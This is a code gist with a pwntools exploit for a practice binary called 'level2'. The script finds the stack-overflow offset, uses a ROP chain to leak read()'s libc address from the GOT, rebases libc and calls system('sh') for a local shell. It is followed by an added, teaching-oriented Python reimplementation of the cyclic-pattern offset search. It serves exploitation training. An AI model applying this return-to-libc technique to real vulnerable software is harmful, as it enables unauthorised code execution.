@zachriggle
Created June 17, 2016 23:09
from pwn import *

# Disassembly of the target (objdump -d -M intel ./level2), kept for reference.
# vulnerable_function() read()s up to 0x100 bytes into a buffer at ebp-0x88,
# so the saved return address sits 0x88 + 4 = 140 bytes into our input.
"""
0804844b <vulnerable_function>:
 804844b:  55                      push   ebp
 804844c:  89 e5                   mov    ebp,esp
 804844e:  81 ec 88 00 00 00       sub    esp,0x88
 8048454:  83 ec 04                sub    esp,0x4
 8048457:  68 00 01 00 00          push   0x100
 804845c:  8d 85 78 ff ff ff       lea    eax,[ebp-0x88]
 8048462:  50                      push   eax
 8048463:  6a 00                   push   0x0
 8048465:  e8 a6 fe ff ff          call   8048310 <read@plt>
 804846a:  83 c4 10                add    esp,0x10
 804846d:  c9                      leave
 804846e:  c3                      ret
0804846f <main>:
 804846f:  8d 4c 24 04             lea    ecx,[esp+0x4]
 8048473:  83 e4 f0                and    esp,0xfffffff0
 8048476:  ff 71 fc                push   DWORD PTR [ecx-0x4]
 8048479:  55                      push   ebp
 804847a:  89 e5                   mov    ebp,esp
 804847c:  51                      push   ecx
 804847d:  83 ec 04                sub    esp,0x4
 8048480:  e8 c6 ff ff ff          call   804844b <vulnerable_function>
 8048485:  83 ec 04                sub    esp,0x4
 8048488:  6a 0d                   push   0xd
 804848a:  68 30 85 04 08          push   0x8048530
 804848f:  6a 01                   push   0x1
 8048491:  e8 aa fe ff ff          call   8048340 <write@plt>
 8048496:  83 c4 10                add    esp,0x10
 8048499:  8b 4d fc                mov    ecx,DWORD PTR [ebp-0x4]
 804849c:  c9                      leave
 804849d:  8d 61 fc                lea    esp,[ecx-0x4]
 80484a0:  c3                      ret
"""

# Load the ELF from disk so we can grab the libc it is linked against.
elf = ELF('./level2')
context.binary = elf          # sets arch/bits/endianness for cyclic(), unpack(), ROP()
libc = elf.libc

# Determine where stack control is by forcing a core dump:
# overflow with a de Bruijn pattern, then map the crashing EIP back to an offset.
io = process(elf.path)
io.sendline(cyclic(1024))
io.recvall()
core = io.corefile
eip = cyclic_find(core.eip)
log.info("EIP control @ %i", eip)
io.close()

# Actually exploit the process this time.
io = process(elf.path)

# First ROP chain: write() the GOT entry of read() to stdout, then return to
# main() so vulnerable_function() runs again and we get a second read().
rop = ROP(elf)
rop.write(1, elf.got['read'], 4)
rop.main()
print(rop.dump())
io.send(fit({eip: bytes(rop)}))

# The leak is the 4-byte little-endian address of read() inside libc.
read = io.unpack()
log.info("read() @ %#x", read)

# Rebase libc against that leak; every other symbol is now known too.
libc.address = read - libc.symbols['read']

# Second ROP chain: system("sh"). Any "sh\0" inside libc (e.g. the tail of
# "/bin/sh") works as the argument.
system = libc.symbols['system']
binsh = next(libc.search(b'sh\x00'))
rop = ROP(libc)
rop.system(binsh)
io.send(fit({eip: bytes(rop)}))

# Second return from vulnerable_function() lands in system(), so we have a shell.
io.interactive()
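The offset-finding step above (cyclic() to overflow, cyclic_find() on the EIP from the core dump) works because the pattern is a de Bruijn sequence: every 4-byte window appears exactly once, so the register value recovered from the crash maps back to a single input offset. The following is an added example, not code from the gist or from pwntools: a pure-Python reimplementation of that pattern plus a simulated crash that stands in for the core dump. The simulation (simulate_crash, BUF_SIZE, READ_LEN, SAVED_EBP) is an assumption derived from the frame layout in the disassembly, where the buffer sits at ebp-0x88, followed by the saved ebp and then the return address.

```python
from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"  # same default alphabet pwntools uses
N = 4                                      # window length: one 32-bit register

# Frame layout read off the disassembly above (assumed values for the simulation):
BUF_SIZE = 0x88   # lea eax,[ebp-0x88]: buffer starts 0x88 bytes below the saved ebp
READ_LEN = 0x100  # push 0x100: read() copies up to 256 bytes into that buffer
SAVED_EBP = 4     # saved frame pointer sits between the buffer and the return address


def _de_bruijn(alphabet=ALPHABET, n=N):
    """Lazily yield the de Bruijn sequence B(k, n): each n-byte window occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, alphabet=ALPHABET, n=N):
    """First `length` bytes of the pattern: cyclic(8) == b'aaaabaaa'."""
    return bytes(islice(_de_bruijn(alphabet, n), length))


def cyclic_find(subseq, alphabet=ALPHABET, n=N):
    """Offset of an n-byte window in the pattern, or -1 if it never occurs.

    An int is treated as a little-endian register value, so the EIP reported by a
    core dump maps straight back to where those bytes sat in the input.
    """
    if isinstance(subseq, int):
        subseq = subseq.to_bytes(n, "little")
    if len(subseq) != n:
        raise ValueError("need exactly %d bytes" % n)
    window = bytearray()
    for i, c in enumerate(_de_bruijn(alphabet, n)):
        window.append(c)
        if len(window) > n:
            del window[0]
        if len(window) == n and window == subseq:
            return i - n + 1
    return -1


def simulate_crash(payload):
    """Stand-in for the core dump: the EIP the overflow in vulnerable_function() yields.

    read() copies at most READ_LEN bytes over the buffer, the saved ebp and then the
    return address, so EIP is the little-endian dword at BUF_SIZE + SAVED_EBP.
    """
    copied = payload[:READ_LEN]
    ret = BUF_SIZE + SAVED_EBP
    if len(copied) < ret + 4:
        raise ValueError("payload too short to reach the return address")
    return int.from_bytes(copied[ret:ret + 4], "little")


def find_eip_offset(length=1024):
    """The offset-finding step of the exploit: overflow with a pattern, map EIP back."""
    return cyclic_find(simulate_crash(cyclic(length)))


def fit_payload(offset, chain):
    """Pad with pattern bytes up to `offset`, then place `chain` over the return address."""
    return cyclic(offset) + chain


if __name__ == "__main__":
    off = find_eip_offset()
    print("EIP control @ %d" % off)                    # 140 == 0x88 + 4
    payload = fit_payload(off, b"RET!")
    print("faked EIP: %#x" % simulate_crash(payload))  # 0x21544552 == u32(b"RET!")
```

Because the search stops at the first match, cyclic_find() only generates as much of the sequence as the crash needs; the 26-letter alphabet with 4-byte windows gives 26^4 = 456976 bytes before any window repeats, far more than the 0x100 bytes read() will copy here.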